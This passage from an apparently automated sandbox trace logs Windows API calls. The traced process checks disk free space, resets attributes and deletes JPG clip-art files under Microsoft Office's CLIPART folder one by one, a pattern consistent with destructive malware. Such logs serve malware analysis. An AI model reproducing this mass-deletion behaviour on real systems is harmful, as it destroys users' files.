lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.479] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG", dwFileAttributes=0x80) returned 1 [0067.480] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175361.jpg")) returned 1 [0067.483] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG", dwFileAttributes=0x80) returned 1 [0067.488] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175428.jpg")) returned 1 [0067.492] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.499] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG", dwFileAttributes=0x80) returned 1 [0067.499] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177257.jpg")) returned 1 [0067.503] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG", dwFileAttributes=0x80) returned 1 [0067.511] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177806.jpg")) returned 1 [0067.514] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG", dwFileAttributes=0x80) returned 1 [0067.520] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg")) returned 1 [0067.523] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.534] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG", dwFileAttributes=0x80) returned 1 [0067.535] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178459.jpg")) returned 1 [0067.538] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.544] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG", dwFileAttributes=0x80) returned 1 [0067.545] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178460.jpg")) returned 1 [0067.548] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.554] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG", dwFileAttributes=0x80) returned 1 [0067.554] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178523.jpg")) returned 1 [0067.557] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.564] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG", dwFileAttributes=0x80) returned 1 [0067.564] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178632.jpg")) returned 1 [0067.567] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.573] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG", dwFileAttributes=0x80) returned 1 [0067.573] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178639.jpg")) returned 1 [0067.577] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG", dwFileAttributes=0x80) returned 1 [0067.586] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178932.jpg")) returned 1 [0067.589] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG", dwFileAttributes=0x80) returned 1 [0067.595] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0179963.jpg")) returned 1 [0067.599] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.604] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG", dwFileAttributes=0x80) returned 1 [0067.604] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0182689.jpg")) returned 1 [0067.611] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.618] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0202045.JPG", dwFileAttributes=0x80) returned 1 [0067.618] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0202045.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0202045.jpg")) returned 1 [0067.622] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.628] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216112.JPG", dwFileAttributes=0x80) returned 1 [0067.629] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216112.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216112.jpg")) returned 1 [0067.633] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.639] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216153.JPG", dwFileAttributes=0x80) returned 1 [0067.639] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0216153.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0216153.jpg")) returned 1 [0067.642] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227419.JPG", dwFileAttributes=0x80) returned 1 [0067.650] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227419.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0227419.jpg")) returned 1 [0067.654] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.662] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227558.JPG", dwFileAttributes=0x80) returned 1 [0067.662] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227558.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0227558.jpg")) returned 1 [0067.668] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287641.JPG", dwFileAttributes=0x80) returned 1 [0067.675] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287641.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287641.jpg")) returned 1 [0067.678] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.683] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287642.JPG", dwFileAttributes=0x80) returned 1 [0067.684] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287642.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287642.jpg")) returned 1 [0067.686] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287643.JPG", dwFileAttributes=0x80) returned 1 [0067.692] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287643.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287643.jpg")) returned 1 [0067.694] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.700] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287644.JPG", dwFileAttributes=0x80) returned 1 [0067.702] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287644.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287644.jpg")) returned 1 [0067.705] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.726] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287645.JPG", dwFileAttributes=0x80) returned 1 [0067.727] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287645.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287645.jpg")) returned 1 [0067.729] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0289430.JPG", dwFileAttributes=0x80) returned 1 [0067.734] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0289430.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0289430.jpg")) returned 1 [0067.739] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.743] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309480.JPG", dwFileAttributes=0x80) returned 1 [0067.743] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309480.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309480.jpg")) returned 1 [0067.746] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309567.JPG", dwFileAttributes=0x80) returned 1 [0067.753] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309567.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309567.jpg")) returned 1 [0067.756] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309585.JPG", dwFileAttributes=0x80) returned 1 [0067.763] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309585.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309585.jpg")) returned 1 [0067.766] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.772] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309598.JPG", dwFileAttributes=0x80) returned 1 [0067.773] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309598.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309598.jpg")) returned 1 [0067.776] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.782] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309664.JPG", dwFileAttributes=0x80) returned 1 [0067.783] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309664.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309664.jpg")) returned 1 [0067.785] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.791] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309705.JPG", dwFileAttributes=0x80) returned 1 [0067.791] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309705.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309705.jpg")) returned 1 [0067.794] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313896.JPG", dwFileAttributes=0x80) returned 1 [0067.801] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313896.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313896.jpg")) returned 1 [0067.804] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.810] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313965.JPG", dwFileAttributes=0x80) returned 1 [0067.810] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313965.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313965.jpg")) returned 1 [0067.813] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.819] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313970.JPG", dwFileAttributes=0x80) returned 1 [0067.819] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313970.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313970.jpg")) returned 1 [0067.822] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313974.JPG", dwFileAttributes=0x80) returned 1 [0067.834] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0313974.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0313974.jpg")) returned 1 [0067.837] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.843] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0314068.JPG", dwFileAttributes=0x80) returned 1 [0067.844] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0314068.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0314068.jpg")) returned 1 [0067.846] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315580.JPG", dwFileAttributes=0x80) returned 1 [0067.859] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315580.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0315580.jpg")) returned 1 [0067.862] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.867] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315612.JPG", dwFileAttributes=0x80) returned 1 [0067.868] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0315612.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0315612.jpg")) returned 1 [0067.871] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.875] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0321179.JPG", dwFileAttributes=0x80) returned 1 [0067.876] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0321179.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0321179.jpg")) returned 1 [0067.879] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.884] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0337280.JPG", dwFileAttributes=0x80) returned 1 [0067.884] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0337280.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0337280.jpg")) returned 1 [0067.887] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 